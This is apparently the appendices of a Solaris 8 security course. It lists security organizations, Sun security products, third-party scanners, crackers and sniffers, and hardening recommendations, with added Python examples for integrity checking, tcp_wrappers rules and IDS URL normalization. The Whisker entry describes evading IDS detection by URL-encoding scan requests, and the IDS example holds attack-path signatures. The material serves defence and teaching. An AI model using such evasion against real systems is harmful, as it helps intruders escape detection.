The Internet Engineering Task Force (IETF) is a large open international community of network designers, operators, vendors, and researchers concerned with the evolution of the Internet architecture and the smooth operation of the Internet.


The IETF working groups are grouped into areas, and managed by Area Directors (ADs). The ADs are members of the Internet Engineering Steering Group (http://www.ietf.org/iesg.html). Providing architectural oversight is the Internet Architecture Board (IAB) (http://www.isi.edu/iab/). The IAB also adjudicates appeals when someone complains that the IESG has failed. The IAB and IESG are chartered by the Internet Society (http://www.isoc.org/) for these purposes. The General Area Director also serves as the chair of the IESG and of the IETF, and is an ex-officio member of the IAB.

The Internet Assigned Numbers Authority (IANA) (http://www.iana.org/) is the central coordinator for the assignment of unique parameter values for Internet protocols. The IANA is chartered by the Internet Society (ISOC) to act as the clearinghouse to assign and coordinate the use of numerous Internet protocol parameters.

The Open Group

http://www.opengroup.org/

The Open Group is a vendor-neutral, international consortium of members and is the result of the 1996 merge of the X/Open Company Ltd. and the Open Software Foundation (OSF).

The Open Group is committed to delivering greater business efficiency by bringing together buyers and suppliers of information technology to lower the time, cost, and risks associated with integrating new technology across the enterprise. The Open Group's mission is:

“To offer all organizations concerned with open information infrastructures a forum where we can share knowledge, integrate open initiatives, and certify approved products and processes in a manner in which they continue to trust our impartiality”.

The key benefit to product suppliers is:

● Accelerated market up-take of products based on Open Systems Standards

The key benefits to their customers are:

● Reduced cost of integration, leading to increased budget available for procurement of products that deliver real value to end users

● Increased flexibility in the infrastructure and interoperability with customers, business partners, and suppliers


Useful Web Sites

The following sites provide more general information on security risks.

Sun Security Coordination Team

http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec

The Sun Security Coordination Team investigates reports of security vulnerabilities, responds to customer inquiries about security problems with Sun software, and publishes Sun Security Bulletins.

To receive security bulletins directly from the Sun Security Coordination Team, send an email to [email protected] and include subscribe cws [your email address] in the subject. For example: subscribe [email protected]

The Computer Incident Advisory Center

http://www.ciac.org/ciac/

The Computer Incident Advisory Center (CIAC) is a department of the United States Department of Energy (US DOE) whose motto is: “Keeping DOE secure.” The CIAC publishes security related bulletins on this Web site.

Computer and Internet Security Resources

http://www.virtuallibrarian.com/legal/ccstatistics.html

This site provides links to security sites as well as other security resources.


Computer Security Institute

http://www.gocsi.com/

The Computer Security Institute (CSI) is a membership organization specifically dedicated to serving and training the information, computer, and network security professional. There is a fee to join. CSI membership benefits include the ALERT newsletter, quarterly Journal, and Buyers Guide. CSI also publishes surveys and reports on topics such as computer crime and information security program assessment (IPAK).

For more information about CSI, email [email protected] or telephone +1 415-947-6320.

InfoWar.com

http://www.infowar.com

Provides articles and a free Infowar.Com List that brings you up-to-the-minute news on info-security, hacking, infowar, attacks, related news, reviews, and opinion.

InfoWorld.com

http://www.infoworld.com/researchtools/subject_index/security.html

This site lists articles relating to security in date order.

Risks Digest

http://catless.ncl.ac.uk/Risks/

This site provides a forum on risks to the public in computers and related systems. Information is provided in the form of online digests, published at irregular intervals (but often more than once a week).


SecurityFocus.com

http://www.securityfocus.com/

Provides security articles and other services, as well as a useful list of security tools.

Security Portal

http://securityportal.com/

Another site providing security articles and weekly digests. Also provides a free security news service sent by email.

SecuritySearch.net

http://www.securitysearch.net/

Another site useful for finding security resources. Lists articles, whitepapers, books, and the latest security bulletins.

SecurityStats.com

http://www.securitystats.com/

This site provides the latest security news and security statistics.

USENIX

www.usenix.org

USENIX is the Advanced Computing Systems Association. It provides information on developments in all aspects of computing systems, not just security.


Appendix B

Solaris OE Security Tools Summary

The Trusted Solaris™ 8 OE

When separation of information and individuals is of prime importance, consider using the Trusted Solaris™ 8 Operating Environment (OE), an extension of the Solaris™ 8 OE. Trusted Solaris 8 software is compatible with the Solaris 8 OE. That means administrators who have used Solaris OE software will also be familiar with most Trusted Solaris administration tools.

Security Extensions

Over the past few decades, computer systems have become corporate-wide resources, essential for day-to-day operations. A wider range of information on new products, employee compensation, health records, marketing and sales plans, and other sensitive data is often stored on these systems. Considerable cost, damage, and loss can be caused by hostile or unauthorized access and use of this information. To control external access, firewalls and other access control methods are often used as gatekeepers. With the Trusted Solaris 8 OE, the software provides extensive internal protection against intruders and misuse by enabling administrators to:

● Limit access to system data and resources – You can set controls on all potential interactions with programs, file access, and utilities on a user-by-user basis.

● Eliminate superuser – You can divide superuser functions into multiple roles to make penetration far more difficult.

● Independent evaluation authority – An independent third party evaluates the operating system to validate that its security functions are working correctly.


● Prevent “eavesdropping” in the window environment – In conventional UNIX environments, an intruding program can capture keystrokes typed in other windows. Trusted Solaris OE software provides a “trusted” path that protects entered data. This is particularly important for passwords, which can also be protected by requiring password changes or generating random passwords.

● Augment security auditing – Actions that might affect security or sensitive files can be monitored. To detect suspicious actions, administrators can generate reports of usage by user, file, data, and time.

● Prevent spoofing programs – Trojan horses, such as programs to intercept passwords or other sensitive data, are prevented by a graphical user interface and protocol. A trusted graphic displayed in a reserved area provides continuous, visible feedback of session integrity.

● Protect local devices against unauthorized users – Authorized users can control access to local devices. In many cases, misuse by authorized users is the main source of security violations. Trusted Solaris software helps stop these violations by enabling administrators to implement a security policy that controls the access and handling of information, including system administration, operation, and monitoring tools.

To find out more about Trusted Solaris 8 OE software, visit Sun’s Web site at www.sun.com/trusted-solaris.

The SunScreen™ Firewall Product

Firewalls control the data flow between two networks, according to security policy rules. The Solaris 8 OE offers built-in firewall functionality, with both the lite- and full-product versions.

SunScreen™ Secure Net 3.1 is a full-featured firewall product that can be deployed throughout an organization to implement a secure business network including extranets, secure intranets, and remote access. It offers affordability, strong cryptography, centralized management, and high availability for screening and encryption.


SunScreen™ 3.1 Lite is a firewall product that protects individual servers or very small workgroups. It is built from the same code as the full SunScreen Secure Net 3.1 product, provides high-speed, dynamic stateful packet-filtering, and includes a subset of the features offered with the full version.

See: http://www.sun.com/software/securenet/
http://www.sun.com/software/securenet/lite/

SKIP

SKIP secures the network at the IP packet level – any networked application gains the benefits of encryption, without requiring modification. SKIP is unique in that it offers “on-the-fly” encryption. An Internet host can send an encrypted packet to another host without requiring a prior message exchange to set up a secure channel.

Some of the advantages of SKIP include:

● No connection setup overhead.

● High-availability; encryption gateways that fail can reboot and resume decrypting packets instantly, without having to renegotiate existing connections.

● Allows unidirectional IP (for example, IP broadcast using satellite or cable).

● Scalable multicast key distribution.

● Gateways can be configured in parallel to perform instant failover.

See: http://www.sun.com/software/skip/skip15/ds-skip/

IPsec

IPsec is a very strong, network-level protocol. It can protect against a variety of threats, such as sniffing, spoofing, flooding, and hijacking. However, it blocks hosts that do not support it or that do not otherwise have a security association with the initiating host. For Web traffic, where the majority of traffic does not require security of any kind, IPsec might need too much overhead. IPsec is well suited for VPNs and extranets.


A key feature of the Solaris 8 OE security is the IPsec architecture. IPsec is an initiative to add security services to the IP protocol. It secures communication channels and ensures that only authorized parties can communicate on them.

Sun's implementation of IPsec in the Solaris 8 OE supports shared-secret encryption. The 128-bit MD5 and SHA-1 algorithms are available for datagram authentication and integrity; 56-bit DES and 168-bit Triple DES algorithms are available for payload encryption. In addition, the Solaris OE also supports manual keying.

See: http://www.sun.com

Sun Enterprise Authentication Mechanism (SEAM)

Sun Enterprise Authentication Mechanism (SEAM) software provides a distributed, enterprise-wide authentication mechanism for single sign-on that reduces the number of times each user must go through a login sequence.

SEAM software delivers an extra layer of security inside your firewall to protect your enterprise from unauthorized access. Powerful authentication and single sign-on capabilities enable SEAM to provide a more secure login process, enabling you to protect your data privacy and integrity.

See: http://www.sun.com/software/solaris/ds/ds-seam/

Pluggable Authentication Modules (PAM)

Pluggable Authentication Modules (PAM) allows integration of various authentication technologies such as UNIX, Kerberos, RSA, smart cards, and DCE into system entry services such as login, passwd, rlogin, telnet, ftp, and su without changing any of these services. PAM is integrated into the Solaris 2.6 release.

See: http://www.sun.com/software/solaris/pam/


Sun Enterprise Network Security Service (SENSS)

Sun Enterprise Network Security Service (SENSS) is a flexible Java technology-based security solution that permits organizations to audit and secure their systems and networks in a modern, heterogeneous, corporate intranet. The software provides a network service daemon that should be installed on each host in your network; these daemons can then be linked together in a hierarchy of trust. This hierarchy can be used for the distribution and execution of digitally-signed packets containing Java technology code, script, or binary code, which can proactively check and fix host security issues in a bulk, batch-oriented manner. Execution requests are also digitally signed, replay attacks are prevented, and network communications are secured by ACLs, PAMs, and security modules.

See: http://www.sun.com/communitysource/senss/

Solaris OE Fingerprint Database

This SunSolveSM service enables you to verify the integrity of files distributed with the Solaris OE, such as the /bin/su executable file, Solaris software patches, and unbundled products such as SPARC compilers.

The Solaris OE Fingerprint Database ensures that you are using a true file in an official binary distribution, and not an altered version that can compromise system security. If you suspect someone has changed your system without your authorization, you can use the Solaris OE Fingerprint Database to check files for alteration or damage.

See: http://sunsolve.sun.com/pubcgi/show.pl?target=content/content7

PATCHDIAG

PATCHDIAG and patchdiag.xref are intended to check and verify the current patch level of Solaris OE systems.

See: http://sunsolve.sun.com


ASET

The Solaris OE includes a software “security guard” for Sun systems called Automated Security Enhancement Tool (ASET). Like the security measures of a building, ASET has three levels of computer system security (Low, Medium, High) that depend on what the system is used for and how valuable or sensitive the data or programs that reside on the system are.


Appendix C

Third-Party Security Tools

SAINT (SATAN/SARA)

SAINT is the Security Administrator's Integrated Network Tool. In its simplest mode, it gathers as much information about remote hosts and networks as possible by examining such network services as finger, NFS, NIS, ftp, tftp, rexd, statd, and other services.

The information gathered includes the presence of various network information services as well as potential security flaws—usually in the form of incorrectly setup or configured network services, well-known bugs in system or network utilities, or poor or ignorant policy decisions. It can then either report on this data or use a simple rule-based system to investigate any potential security problems.

Users can examine, query, and analyze the output with an HTML browser. While the program is primarily geared towards analyzing the security implications of the results, a great deal of general network information can be gained when using the tool—network topology, network services running, types of hardware and software being used on the network, and so on.

However, the real power of SAINT comes into play when used in exploratory mode. Based on the initial data collection and a user configurable ruleset, SAINT examines the avenues of trust and dependencies and iterates further data collection runs over secondary hosts. This not only allows you to analyze your own network or hosts, but also to examine the real implications inherent in network trust and services and helps you make reasonably educated decisions about the security level of the systems involved.


SAINT has a target acquisition program that normally uses the fping command to determine whether a host or set of hosts in a subnet are alive. When a host is behind a firewall, however, the tcp_scan program is used to probe common ports to test for an alive host. It then passes this target list to an engine that drives the data collection and the main feedback loop. Each host is examined to see if it has been seen before, and, if not, a list of tests/probes is run against it (the set of tests depends on the distance the host is from the initial target and what probe level has been set.) The tests emit a data record that has the hostname, the test run, and any results found from the probe; this data is saved in files for analysis. The user interface uses HTML to link the often vast amounts of data to more coherent and palatable results that the user can digest and understand.

See: http://athena.fit.qut.edu.au/usr/src/saint-1.2.1/html/saint.html
ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/
http://www-arc.com/sara/

Courtney

Courtney detects and reports the presence of scanners, programs like SATAN, that probe a number of ports on a system in a short time period. The information gathered can identify security vulnerabilities.

Courtney, a Perl script, uses a utility called tcpdump to determine whether a scanner has probed a system. Essentially, the tcpdump utility sets the host's Ethernet interface so that the utility can analyze all the TCP/IP packets transmitted on the wire. The tcpdump utility then filters the information to highlight suspicious activity and hands this information to Courtney for further analysis. Courtney searches for a specific fingerprint in the data, but unfortunately this is not always successful, because the tcpdump utility might sometimes relay inaccurate information. Particularly on slow hosts or networks with very high traffic, the tcpdump utility might miss some packets and, therefore, miss the distinctive signature of a scanner. However, Courtney does provide a first line of defense.

See: ftp://ftp.csc.ncsu.edu/pub/security/anti-satan/


Gabriel

Gabriel is a SATAN detector, similar to Courtney. While it is only available for Sun platforms, it is written entirely in the C programming language, and comes prebuilt.

See: ftp://ftp.csc.ncsu.edu/pub/security/

TripWire

TripWire for Servers software monitors file changes, verifies integrity, and notifies you of any violations of data at rest on network servers. Tripwire for Servers monitors all file changes regardless of whether they originated inside or outside of your organization. TripWire for Servers also identifies changes to system attributes including file size, access flags, write time, and more. You can quickly assess the impact of changes using TripWire for Servers' easy-to-read reports.

See: http://www.tripwire.com/
ftp://ftp.cerias.purdue.edu/pub/tools/unix/ids/tripwire/
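Both the Solaris OE Fingerprint Database described in Appendix B and TripWire rest on the same mechanism: record a file's attributes and a cryptographic digest, then compare later. The following is an added example for this guide, not code from Tripwire or from Sun's SunSolve service. It takes a Tripwire-style baseline (size, permission bits, modification time, MD5) of a directory tree, reports what changed, and separately checks files against a vendor-style table of known-good MD5 fingerprints; the `known_good` table and the files under the temporary directory are constructed for the demonstration, and the function names are this example's own.

```python
import hashlib
import os
import stat
import tempfile


def md5_of(path):
    """MD5 hex digest of a file, read in chunks so large binaries are fine."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(path):
    """Attributes a Tripwire-style tool records for one file."""
    st = os.lstat(path)
    return {"size": st.st_size, "mode": stat.S_IMODE(st.st_mode),
            "mtime": int(st.st_mtime), "md5": md5_of(path)}


def baseline(root):
    """Map every regular file under root (relative path) to its snapshot."""
    return {os.path.relpath(os.path.join(d, f), root): snapshot(os.path.join(d, f))
            for d, _, files in os.walk(root) for f in files}


def compare(old, new):
    """Return {relpath: [changed attribute names]}; 'added' or 'removed' for
    files present in only one of the two snapshots."""
    report = {}
    for p in set(old) | set(new):
        if p not in new:
            report[p] = ["removed"]
        elif p not in old:
            report[p] = ["added"]
        else:
            diff = [k for k in old[p] if old[p][k] != new[p][k]]
            if diff:
                report[p] = diff
    return report


def check_fingerprints(root, known_good):
    """Fingerprint-database style check: for each published (relpath, md5)
    pair whose file exists, report whether the local digest matches."""
    return {p: md5_of(os.path.join(root, p)) == digest
            for p, digest in known_good.items()
            if os.path.exists(os.path.join(root, p))}


def demo():
    """Constructed scenario: baseline a tree, alter one file, add another."""
    with tempfile.TemporaryDirectory() as root:
        su = os.path.join(root, "bin", "su")
        os.makedirs(os.path.dirname(su))
        with open(su, "wb") as f:
            f.write(b"#!/bin/sh\nexec /sbin/real-su \"$@\"\n")   # constructed stand-in for a binary
        os.chmod(su, 0o755)
        known_good = {"bin/su": md5_of(su)}   # what a vendor fingerprint table would publish
        before = baseline(root)
        with open(su, "ab") as f:             # alteration: bytes appended to the file
            f.write(b"tampered\n")
        os.chmod(su, 0o700)                   # and its permission bits changed
        with open(os.path.join(root, "bin", "extra"), "wb") as f:
            f.write(b"new file\n")
        after = baseline(root)
        return compare(before, after), check_fingerprints(root, known_good)


if __name__ == "__main__":
    changes, fingerprints = demo()
    print("changed:", changes)
    print("fingerprint ok:", fingerprints)
```

The baseline must be stored somewhere the monitored host cannot rewrite it (read-only media or a separate host), otherwise an intruder who alters a file can refresh the baseline as well; the fingerprint check avoids that problem by comparing against digests published by the vendor rather than against local state.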

Top

Monitors the top CPU, memory, and disk usage.

See: http://www.sunfreeware.com

TCP Wrappers

With this package you can monitor and filter incoming requests for the systat, finger, ftp, telnet, rlogin, rsh, exec, tftp, talk, and other network services.


This package provides tiny daemon wrapper programs that can be installed without any changes to existing software or to existing configuration files. The wrappers report the name of the client host and of the requested service; the wrappers do not exchange information with the client or server applications, and impose no overhead on the actual conversation between the client and server applications.

See: ftp://playground.sun.com/pub/casper
http://www.sunfreeware.com
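The filtering decision the wrappers make is driven by two files, hosts.allow and hosts.deny, each holding `daemon list : client list` rules. The following is an added example for this guide that re-implements that decision in Python to make the evaluation order visible; it is not the tcp_wrappers source and supports only a subset of its pattern language (ALL, LOCAL, a leading-dot domain suffix, a trailing-dot network prefix, exact names, and a single EXCEPT). The two file contents embedded below are constructed, and the host names and addresses in them are placeholders.

```python
# Constructed hosts.allow / hosts.deny contents (not taken from a real system).
HOSTS_ALLOW = """\
# daemon list : client list
in.telnetd, in.ftpd : 192.168.1. EXCEPT 192.168.1.66
sshd : .example.com
in.fingerd : LOCAL
"""
HOSTS_DENY = """\
ALL : ALL
"""


def parse_rules(text):
    """Return [(daemon_list, client_list_string), ...] from a hosts.allow or
    hosts.deny style file. Comments and blank lines are ignored."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        daemons, clients = (part.strip() for part in line.split(":", 1))
        rules.append(([d.strip() for d in daemons.split(",")], clients))
    return rules


def client_matches(pattern, host, addr):
    """Match one client pattern against the peer's host name and address."""
    pattern = pattern.strip()
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":
        return "." not in host           # unqualified name: same domain
    if pattern.startswith("."):
        return host.endswith(pattern)    # domain suffix, e.g. .example.com
    if pattern.endswith("."):
        return addr.startswith(pattern)  # network prefix, e.g. 192.168.1.
    return pattern in (host, addr)       # exact host name or address


def client_list_matches(clients, host, addr):
    """Comma-separated patterns, optionally 'list EXCEPT list'."""
    if " EXCEPT " in clients:
        included, excluded = clients.split(" EXCEPT ", 1)
        return (client_list_matches(included, host, addr)
                and not client_list_matches(excluded, host, addr))
    return any(client_matches(p, host, addr) for p in clients.split(","))


def rules_match(rules, daemon, host, addr):
    return any((daemon in daemons or "ALL" in daemons)
               and client_list_matches(clients, host, addr)
               for daemons, clients in rules)


def access_allowed(daemon, host, addr, allow=HOSTS_ALLOW, deny=HOSTS_DENY):
    """tcp_wrappers order: a match in hosts.allow grants access, otherwise a
    match in hosts.deny refuses it, otherwise the connection is allowed."""
    if rules_match(parse_rules(allow), daemon, host, addr):
        return True
    if rules_match(parse_rules(deny), daemon, host, addr):
        return False
    return True


if __name__ == "__main__":
    print(access_allowed("in.telnetd", "ws1.example.com", "192.168.1.20"))  # True
    print(access_allowed("in.telnetd", "ws9.example.com", "192.168.1.66"))  # False
```

The last branch of `access_allowed` is the point to notice: with an empty hosts.deny every unmatched request is accepted, which is why a default-deny `ALL : ALL` entry belongs in hosts.deny on any wrapped host.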

Crack

Crack is a password guessing program that quickly locates insecurities in UNIX (or other) password files by scanning the contents of a password file, looking for users who have chosen a weak login password.

See: ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/

John the Ripper

John the Ripper is a password cracker, currently available for UNIX, DOS, and Windows NT/95. It detects weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX.

See: http://www.openwall.com/john/

AntiCrack

AntiCrack is a password checking program. It checks a “raw (not-encrypted)” UNIX password, so it is much faster than Crack.

AntiCrack uses rules and dictionaries in the same manner as Crack does. If you already use Crack, the rules and the dictionaries for Crack can be used for AntiCrack as they are.

See: http://www.teu.ac.jp/nsit/~tominaga/anticrack/


The npasswd Command

The npasswd command replaces the system passwd command to ensure that users use passwords undetectable by crack.

See: ftp://ftp.cc.utexas.edu/pub/npasswd

Secure Shell (SSH)

Secure Shell (SSH) is a telnet and ftp replacement. Features of the SSH Secure Shell include:

● Protects all passwords and data.

● Full replacement for telnet, rlogin, rsh, rcp, and ftp commands.

● Fully integrated secure file transfer and file copying.

● Graphical user interface on Microsoft Windows.

● Automatic authentication of users, no passwords sent in clear text to prevent the stealing of passwords.

● Multiple strong authentication methods that prevent such security threats as spoofing identity.

● Authentication of both ends of connection, the server and the client are authenticated to prevent identity spoofing, Trojan horses, and so on.

● Automatic authentication using agents enables strong authentication for multiple systems with a single sign-on.

● Transparent and automatic tunneling of X11 sessions.

● Tunneling of arbitrary TCP/IP-based applications, such as email. Encryption and compression of data for security and speed.

● Multiple built-in authentication methods, including passwords, public key, and host-based authentication.

● Multiple ciphers for encryption, including 3DES, Blowfish, and the AES candidate TWOFISH.

See: http://www.ssh.com/products/ssh/index.html


The nmap Utility

The nmap utility scans the ports of large networks, although it also works for single hosts. The philosophy behind the nmap utility is TMTOWTDI (There's More Than One Way To Do It). This is the Perl slogan, but it is equally applicable to scanners. Sometimes you need speed, other times you need stealth. In some cases, bypassing firewalls might be required. You might want to scan different protocols (UDP, TCP, ICMP, and so on). You just cannot do all this with one scanning mode. And you do not want to have ten different scanners around, all with different interfaces and capabilities. Therefore, almost every scanning technique is incorporated into the nmap utility. Specifically, the nmap utility supports:

● Vanilla TCP connect() scanning

● TCP SYN (half open) scanning

● TCP FIN, Xmas, or NULL (stealth) scanning

● TCP FTP proxy (bounce attack) scanning

● SYN/FIN scanning using IP fragments (bypasses some packet filters)

● TCP ACK and Microsoft Window scanning

● UDP raw ICMP port unreachable scanning

● ICMP scanning (ping-sweep)

● TCP Ping scanning

● Direct (non–portmapper) RPC scanning

● Remote OS Identification by TCP/IP fingerprinting

● Reverse-identity scanning

See: http://www.insecure.org/nmap/


Titan

Titan is a collection of programs, each of which either fixes or tightens one or more potential security problems with a particular aspect in the setup or configuration of a UNIX system. Created by Brad Powell, it was written in the Bourne shell, and its modular design makes it easy for anyone who can write a UNIX shell script or program to add to it, as well as completely understand the internal workings of the system.

Titan does not replace other security tools, but when used in combination with them, it can help make the transformation of a new, out-of-the-box system into a firewall or security-conscious system a significantly easier task. In a nutshell, it attempts to improve the security of the system it runs on.

See: http://www.fish.com/titan/

COPS

COPS (Computer Oracle and Password System) is a set of programs that attempt to automate security checks that are often performed manually (or perhaps with self-written short shell scripts or programs) by a systems administrator.

See: ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/

Tiger

Tiger supplements COPS by providing additional information on whether the system files have been tampered with. Tiger is one of the tools used regularly on Texas A&M's UNIX computers to detect intrusions.

See: ftp://ftp.vanderbilt.edu/pub/unix/


The dsniff Sniffer

The dsniff package contains tools that examine traffic on a network, including the dsniff sniffer, webspy, a URL sniffer, and other tools. Putting this program on your network might constitute a security problem; it finds weaknesses in local area network communications.

See: http://www.sunfreeware.com

The sudo Utility

The sudo utility permits superuser-like access controls without the need to give users the superuser password.

See: http://www.sunfreeware.com

Cerberus Internet Scanner (CIS)

The CIS is a free security scanner written and maintained by Cerberus Information Security, Ltd. and is designed to help administrators locate and fix security holes in their computer systems.

See: http://www.cerberus-infosec.co.uk/cis.shtml

Nessus

The Nessus Project provides to the Internet community a free, powerful, up-to-date, and easy-to-use remote security scanner.

A security scanner is a software tool which remotely audits a given network and determines whether hackers can break into it, or misuse it in some way.

See: http://www.nessus.org


Whisker

Whisker is a CGI scanner with these features:

● The CGI directory can be predefined from the default /cgi-bin, to a different directory, or a set of well-known CGI paths.

● Before checking for vulnerabilities, Whisker verifies that the CGI directory exists, and that the CGI itself exists, reducing the number of false positives.

● The server type and version is checked prior to any testing, reducing checks for unsupported CGIs (for example, Whisker tests the details.idc file for vulnerability).

● Virtual hosting is fully supported, allowing Whisker to test vulnerabilities against subdomains within the same server (a feature not supported by all CGI scanners).

● Whisker can be taught to see through custom made “success” pages, which are usually a result of “not found” errors (this minimizes false positives).

● Whisker was written in Perl for easy portability and manipulation.

● Interoperability between products and files such as comma-separated files, nmap result files, IP subnets, and so on.

● URL encoding that hides scans from IDS programs; something like '/cgi-bin/phf?' is requested by its mime encoding equivalent: '/%63%67%69%2d%62%69%6e/%66%69%6e%67%65%72', which causes most IDS programs to not detect the scan.

● Support for a script language that enables people to easily add new scanning scripts.

See: http://ww.wiretrip.net/rfp/
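The URL-encoding point above is really a statement about the IDS: a signature compared against the raw request misses any percent-encoded spelling of the same path. The following is an added example for this guide, not code from Whisker or from any IDS product, showing the normalization a detector needs before matching. It percent-decodes the path once, lower-cases it, and collapses `.` and `..` segments, then runs the same literal signatures against the raw and the normalized form. The request strings and the two signatures are constructed for the demonstration; the second sample request is the encoded string quoted on this page, which decodes to /cgi-bin/finger.

```python
from urllib.parse import unquote

# Constructed sample request paths (not captured traffic).
SAMPLE_REQUESTS = [
    "/index.html",
    "/%63%67%69%2d%62%69%6e/%66%69%6e%67%65%72",   # encoded form quoted on this page
    "/cgi-bin/phf?Qalias=x",
    "/cgi-bin/%70%68%66?Qalias=x",                   # only the script name encoded
    "/cgi-bin/../cgi-bin/phf",                       # dot-segment padding
]

# Literal path signatures, as a naive IDS would carry them.
SIGNATURES = ["/cgi-bin/phf", "/cgi-bin/finger"]


def normalize_path(path):
    """Canonical form used for matching: query string removed, percent-decoded
    exactly once, lower-cased, and '.' / '..' segments collapsed. Decoding is
    deliberately done a single time so that a literal '%25' is not mistaken
    for the start of a second encoding layer."""
    path = path.split("?", 1)[0]
    path = unquote(path)
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg.lower())
    return "/" + "/".join(parts)


def naive_match(path):
    """Signatures that match the request exactly as it arrived."""
    return [s for s in SIGNATURES if s in path]


def normalized_match(path):
    """Signatures that match after normalization."""
    return [s for s in SIGNATURES if s in normalize_path(path)]


def compare(requests=SAMPLE_REQUESTS):
    """Return {path: (naive_hits, normalized_hits)} so the gap is visible."""
    return {p: (naive_match(p), normalized_match(p)) for p in requests}


if __name__ == "__main__":
    for path, (raw, norm) in compare().items():
        print(f"{path!r}: raw={raw} normalized={norm}")
```

Of the five constructed requests, raw matching catches only the two that spell `/cgi-bin/phf` literally; after normalization the two encoded requests are caught as well, and `/index.html` still produces no alert.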


The tcpdump Tool

The tcpdump tool is a powerful tool for network monitoring and data acquisition. This program allows you to dump the traffic on a network. It can be used to print the headers of packets on a network interface that match a given expression. You can use this tool to track down network problems, to detect “ping attacks,” or to monitor the network activities.

See: http://www.tcpdump.org

SWATCH

Simple WATCHdog (SWATCH) is a tool that actively monitors UNIX log files.

See: ftp://ftp.stanford.edu/general/security-tools/swatch/

Pretty Good Privacy (PGP)

PGP, or Pretty Good Privacy, is a powerful cryptographic product family that enables people to securely exchange messages, and to secure files, disk volumes, and network connections with both privacy and strong authentication.

See: http://web.mit.edu/network/pgp.html

Kerberos

Kerberos is a network authentication protocol. It provides strong authentication for client/server applications by using secret-key cryptography. A free implementation of this protocol is available from the Massachusetts Institute of Technology. Kerberos is available in many commercial products as well.

See: http://web.mit.edu/kerberos/www/

Virtual Private Networks

Virtual private networks (VPNs) provide an encrypted connection between a user's distributed sites over a public network (for example, the Internet). By contrast, a private network uses dedicated circuits and possibly encryption.

See: http://www.epm.ornl.gov/~dunigan/vpn.html

Anti-Sniffing Tools

Use these tools to detect if someone is sniffing packets on your network.

AntiSniff - Runs on Microsoft Windows only

See: http://www.l0pht.com

Sentinel - Runs on UNIX

See: http://www.packetfactory.net/Projects/Sentinel

Appendix D

Security Recommendations

This appendix provides a summary of the security recommendations taken from the text of the SC-300 “Administering Security on the Solaris™ 8 Operating Environment” course. It is intended only as a guide, not a prescriptive to-do list, because there are always alternative methods to achieve the same outcome. The important thing is that you are aware of the risks and take actions appropriate for the sensitivity of the data or the importance of the application environment.

● Educate your user community to respect and accept the level of security required.

● Have a security policy. Ensure that the pertinent aspects are communicated to everyone.

● Turn on logging and monitor logs on a daily basis. Use the Syslog and swatch programs to simplify this task.

● Avoid giving out the root password. Disseminate superuser privileges with RBAC or the sudo command.

● Check the patch releases and update software on a regular basis. Use the patchdiag tool and the patchdiag.xref file to check and verify the current patch level of Solaris OE systems.

● Use the Solaris OE Fingerprint Database to verify the integrity of files distributed with the Solaris OE.

● Use TripWire to fingerprint your configured system and compare it with currently stored fingerprints on a regular basis.

● Do not allow users to have weak, easily guessed, or reused passwords. Consider the use of the npasswd command as a replacement for the passwd command, or check passwords with the AntiCrack tool. Use password aging.

● Run the crack program on your password file.

● Do not allow plain text passwords across the network. Avoid use of rlogin, Telnet, and FTP and use Open Secure Shell (OpenSSH) instead.

● Disable all unnecessary network services, such as sendmail (SMTP), rpc, ftp, dns, snmp, and others.

● Remove programs such as finger, rusers, and rpcinfo that provide attackers with operating system information, application versions, user names, and other information.

● Remove all unnecessary SUID and SGID programs.

● Use the restricted shell (rsh) for guest accounts.

● Use expiration dates for temporary user accounts, such as those provided to contractors.

● Expire and then delete dormant accounts.

● Set disk quotas and limits to reduce the chance of denial of service attacks.

● Use file digests to increase the chance of finding Trojan horses and back doors.

● Run Titan to harden the network.

● Secure backups and removable media devices.

● Make a backup of the system in a known clean state. Destroy any compromised backups after a suspected break-in.

● Restore data with care.

● Correctly configure Internet servers; in particular, be aware of the security risks of FTP servers and CGI scripts behind Web servers.

● Use correctly configured firewalls. Use SunScreen Secure Net 3.1 or SunScreen 3.1 Lite, which provide strong cryptography, centralized management, and packet filtering.

● Secure your VPNs and extranets with IPsec to protect against a variety of threats, such as sniffing, spoofing, flooding, and hijacking.

● Use SAINT to check security over the network and to probe for potential security weak spots.

● Run Courtney to monitor for SAINT- or SATAN-like attacks.

● Run an intrusion detection system (IDS).

● Mount dummy attacks to check procedures.

● Use TCP Wrappers to filter incoming requests for network services and block untrusted hosts.

● Use the chroot command to restrict access with Anonymous FTP.

● Configure routers to prevent information leakage and unauthorized access.

● Secure remote access points (such as modems). Use Virtual Private Networks (VPNs) where possible.

● Avoid excessive use of trust relationships, such as .rhosts.

● Avoid excessive use of NFS exports.

● Check for sniffer programs capturing network data. Use the AntiSniff or Sentinel programs.
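Several of the recommendations above (file digests against Trojan horses and back doors, removing unnecessary SUID and SGID programs, TripWire-style comparison against stored fingerprints) reduce to one mechanism: record a baseline of each file's mode bits and content digest while the system is in a known clean state, then compare a later snapshot against it. The Python below is an added example, not code from the course, from TripWire, or from the Solaris Fingerprint Database. It uses SHA-256 from hashlib (an assumption; the course's tools are MD5-based), builds its directory contents in a temporary directory, and run_demo() is a hypothetical driver that stages a changed binary and a new setuid file so the report has something to show.

```python
"""Baseline-and-compare check for SUID/SGID programs and file digests.

Added example, not from the SC-300 course and not TripWire or Fingerprint
Database code. A snapshot maps each regular file under a root to its mode
bits and SHA-256 digest; compare() reports what a reviewer would act on.
The files used by run_demo() are constructed in a temporary directory.
"""
import hashlib
import os
import stat
import tempfile

SUID_SGID_MASK = stat.S_ISUID | stat.S_ISGID


def file_digest(path, chunk=65536):
    """SHA-256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_suid_or_sgid(mode):
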